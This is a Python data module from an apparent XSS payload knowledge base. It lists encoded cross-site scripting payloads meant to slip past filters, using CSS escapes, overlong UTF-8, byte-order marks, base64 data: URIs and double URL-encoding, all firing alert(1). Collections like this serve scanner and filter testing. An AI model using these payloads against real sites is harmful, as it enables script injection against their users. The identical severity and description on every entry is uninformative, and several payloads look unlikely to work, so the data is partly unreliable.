#!/usr/bin/env python3
"""
Project: BRS-KB (BRS XSS Knowledge Base)
Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Date: 2025-12-27 UTC
Status: Refactored
Telegram: https://t.me/EasyProTech

Encoding Core Payloads - Part 2
"""

from typing import Dict

from ..models import PayloadEntry


ENCODING_CORE_PAYLOADS_PART2: Dict[str, PayloadEntry] = {
    "encoding_038": PayloadEntry(
        payload="<style>\\53 cript{color:red}</style>",
        contexts=["html_content", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Encoding payload",
        tags=["encoding", "unicode", "hex"],
        waf_evasion=False,
    ),
    "encoding_039": PayloadEntry(
        payload="<style>\\4F nload{color:red}</style>",
        contexts=["html_content", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Encoding payload",
        tags=["encoding", "unicode", "hex"],
        waf_evasion=False,
    ),
    "encoding_040": PayloadEntry(
        payload="<style>/**/a/**/l/**/e/**/r/**/t/**/{color:red}</style>",
        contexts=["html_content", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Encoding payload",
        tags=["encoding", "unicode", "hex"],
        waf_evasion=False,
    ),
    "encoding_041": PayloadEntry(
        payload="<style>al/**/ert{color:red}</style>",
        contexts=["html_content", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Encoding payload",
        tags=["encoding", "unicode", "hex"],
        waf_evasion=False,
    ),
    "encoding_042": PayloadEntry(
        payload='<style>@import/**/"javascript:alert(1)"</style>',
        contexts=["html_content", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Encoding payload",
        tags=["encoding", "unicode", "hex"],
        waf_evasion=False,
    ),
    "encoding_043": PayloadEntry(
        payload='<style>@import "\\6A \\61 \\76 \\61 \\73 \\63 \\72 \\69 \\70 \\74 \\3A \\61 \\6C \\65 \\72 \\74 \\28 \\31 \\29"</style>',
        contexts=["html_content", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Encoding payload",
        tags=["encoding", "unicode", "hex"],
        waf_evasion=False,
    ),
    "encoding_044": PayloadEntry(
        payload='<style>body{background:url("\\6A \\61 \\76 \\61 \\73 \\63 \\72 \\69 \\70 \\74 \\3A \\61 \\6C \\65 \\72 \\74 \\28 \\31 \\29")}</style>',
        contexts=["html_content", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Encoding payload",
        tags=["encoding", "unicode", "hex"],
        waf_evasion=False,
    ),
    "encoding_045": PayloadEntry(
        payload="%F0%80%80%BCscript%F0%80%80%BEalert(1)%F0%80%80%BC/script%F0%80%80%BE",
        contexts=["html_content", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Encoding payload",
        tags=["encoding", "unicode", "hex"],
        waf_evasion=False,
    ),
    "encoding_046": PayloadEntry(
        payload="%FF%FE%3C%00s%00c%00r%00i%00p%00t%00%3E%00a%00l%00e%00r%00t%00(%001%00)%00%3C%00/%00s%00c%00r%00i%00p%00t%00%3E%00",
        contexts=["html_content", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Encoding payload",
        tags=["encoding", "unicode", "hex"],
        waf_evasion=False,
    ),
    "encoding_047": PayloadEntry(
        payload="%FE%FF%00%3C%00s%00c%00r%00i%00p%00t%00%3E%00a%00l%00e%00r%00t%00(%001%00)%00%3C%00/%00s%00c%00r%00i%00p%00t%00%3E",
        contexts=["html_content", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Encoding payload",
        tags=["encoding", "unicode", "hex"],
        waf_evasion=False,
    ),
    "encoding_048": PayloadEntry(
        payload="%FF%FE%00%00%3C%00%00%00s%00%00%00c%00%00%00r%00%00%00i%00%00%00p%00%00%00t%00%00%00%3E%00%00%00",
        contexts=["html_content", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Encoding payload",
        tags=["encoding", "unicode", "hex"],
        waf_evasion=False,
    ),
    "encoding_049": PayloadEntry(
        payload="%C0%BCimg src=x onerror=alert(1)%C0%BE",
        contexts=["html_content", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Encoding payload",
        tags=["encoding", "unicode", "hex"],
        waf_evasion=False,
    ),
    "encoding_050": PayloadEntry(
        payload="%E0%80%BCsvg onload=alert(1)%E0%80%BE",
        contexts=["html_content", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Encoding payload",
        tags=["encoding", "unicode", "hex"],
        waf_evasion=False,
    ),
    "encoding_051": PayloadEntry(
        payload="%EF%BB%BF<script>alert(1)</script>",
        contexts=["html_content", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Encoding payload",
        tags=["encoding", "unicode", "hex"],
        waf_evasion=False,
    ),
    "encoding_052": PayloadEntry(
        payload="%FF%FE<script>alert(1)</script>",
        contexts=["html_content", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Encoding payload",
        tags=["encoding", "unicode", "hex"],
        waf_evasion=False,
    ),
    "encoding_053": PayloadEntry(
        payload="%FE%FF<script>alert(1)</script>",
        contexts=["html_content", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Encoding payload",
        tags=["encoding", "unicode", "hex"],
        waf_evasion=False,
    ),
    "encoding_054": PayloadEntry(
        payload="data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==",
        contexts=["html_content", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Encoding payload",
        tags=["encoding", "unicode", "hex"],
        waf_evasion=False,
    ),
    "encoding_055": PayloadEntry(
        payload="data:text/html;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+",
        contexts=["html_content", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Encoding payload",
        tags=["encoding", "unicode", "hex"],
        waf_evasion=False,
    ),
    "encoding_056": PayloadEntry(
        payload="data:text/html;base64,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==",
        contexts=["html_content", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Encoding payload",
        tags=["encoding", "unicode", "hex"],
        waf_evasion=False,
    ),
    "encoding_057": PayloadEntry(
        payload="data:application/javascript;base64,YWxlcnQoMSk=",
        contexts=["html_content", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Encoding payload",
        tags=["encoding", "unicode", "hex"],
        waf_evasion=False,
    ),
    "encoding_058": PayloadEntry(
        payload="data:text/javascript;base64,YWxlcnQoMSk=",
        contexts=["html_content", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Encoding payload",
        tags=["encoding", "unicode", "hex"],
        waf_evasion=False,
    ),
    "encoding_059": PayloadEntry(
        payload="data:application/x-javascript;base64,YWxlcnQoMSk=",
        contexts=["html_content", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Encoding payload",
        tags=["encoding", "unicode", "hex"],
        waf_evasion=False,
    ),
    "encoding_060": PayloadEntry(
        payload="data:image/svg+xml;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+",
        contexts=["html_content", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Encoding payload",
        tags=["encoding", "unicode", "hex"],
        waf_evasion=False,
    ),
    "encoding_061": PayloadEntry(
        payload="data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIG9ubG9hZD0iYWxlcnQoMSkiPg==",
        contexts=["html_content", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Encoding payload",
        tags=["encoding", "unicode", "hex"],
        waf_evasion=False,
    ),
    "encoding_062": PayloadEntry(
        payload="data:text/html;base64,PCFET0NUWVBFIGh0bWw+PGh0bWw+PGhlYWQ+PC9oZWFkPjxib2R5PjxzY3JpcHQ+YWxlcnQoMSk8L3NjcmlwdD48L2JvZHk+PC9odG1sPg==",
        contexts=["html_content", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Encoding payload",
        tags=["encoding", "unicode", "hex"],
        waf_evasion=False,
    ),
    "encoding_063": PayloadEntry(
        payload="data:text/html;charset=utf-8;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==",
        contexts=["html_content", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Encoding payload",
        tags=["encoding", "unicode", "hex"],
        waf_evasion=False,
    ),
    "encoding_064": PayloadEntry(
        payload="data:text/html;charset=utf-16;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==",
        contexts=["html_content", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Encoding payload",
        tags=["encoding", "unicode", "hex"],
        waf_evasion=False,
    ),
    "encoding_065": PayloadEntry(
        payload="data:text/plain;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==",
        contexts=["html_content", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Encoding payload",
        tags=["encoding", "unicode", "hex"],
        waf_evasion=False,
    ),
    "encoding_066": PayloadEntry(
        payload="data:application/octet-stream;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==",
        contexts=["html_content", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Encoding payload",
        tags=["encoding", "unicode", "hex"],
        waf_evasion=False,
    ),
    "encoding_067": PayloadEntry(
        payload="%3C&#x69;mg src=x onerror=alert(1)%3E",
        contexts=["html_content", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Encoding payload",
        tags=["encoding", "unicode", "hex"],
        waf_evasion=False,
    ),
    "encoding_068": PayloadEntry(
        payload="&#60;scr%69pt&#62;alert(1)&#60;/scr%69pt&#62;",
        contexts=["html_content", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Encoding payload",
        tags=["encoding", "unicode", "hex"],
        waf_evasion=False,
    ),
    "encoding_069": PayloadEntry(
        payload="\\u003Cscript\\u003E%61%6C%65%72%74(1)\\u003C/script\\u003E",
        contexts=["html_content", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Encoding payload",
        tags=["encoding", "unicode", "hex"],
        waf_evasion=False,
    ),
    "encoding_070": PayloadEntry(
        payload="%3Cscript%3E\\u0061\\u006C\\u0065\\u0072\\u0074(1)%3C/script%3E",
        contexts=["html_content", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Encoding payload",
        tags=["encoding", "unicode", "hex"],
        waf_evasion=False,
    ),
    "encoding_071": PayloadEntry(
        payload="&#60;script&#62;\\u0061\\u006C\\u0065\\u0072\\u0074(1)&#60;/script&#62;",
        contexts=["html_content", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Encoding payload",
        tags=["encoding", "unicode", "hex"],
        waf_evasion=False,
    ),
    "encoding_072": PayloadEntry(
        payload="&lt;script&gt;\\x61\\x6C\\x65\\x72\\x74(1)&lt;/script&gt;",
        contexts=["html_content", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Encoding payload",
        tags=["encoding", "unicode", "hex"],
        waf_evasion=False,
    ),
    "encoding_073": PayloadEntry(
        payload="%64%61%74%61%3A%74%65%78%74%2F%68%74%6D%6C%3B%62%61%73%65%36%34%2C%50%48%4E%6A%63%6D%6C%77%64%44%35%68%62%47%56%79%64%43%67%78%4B%54%77%76%63%32%4E%79%61%58%42%30%50%67%3D%3D",
        contexts=["html_content", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Encoding payload",
        tags=["encoding", "unicode", "hex"],
        waf_evasion=False,
    ),
    "encoding_074": PayloadEntry(
        payload="<style>\\61 \\6C \\65 \\72 \\74 \\28 \\31 \\29</style><script>\\u0061\\u006C\\u0065\\u0072\\u0074(1)</script>",
        contexts=["html_content", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Encoding payload",
        tags=["encoding", "unicode", "hex"],
        waf_evasion=False,
    ),
    "encoding_075": PayloadEntry(
        payload="%25%33%43%73%63%72%69%70%74%25%33%45%61%6C%65%72%74%28%31%29%25%33%43%2F%73%63%72%69%70%74%25%33%45",
        contexts=["html_content", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Encoding payload",
        tags=["encoding", "unicode", "hex"],
        waf_evasion=False,
    ),
}
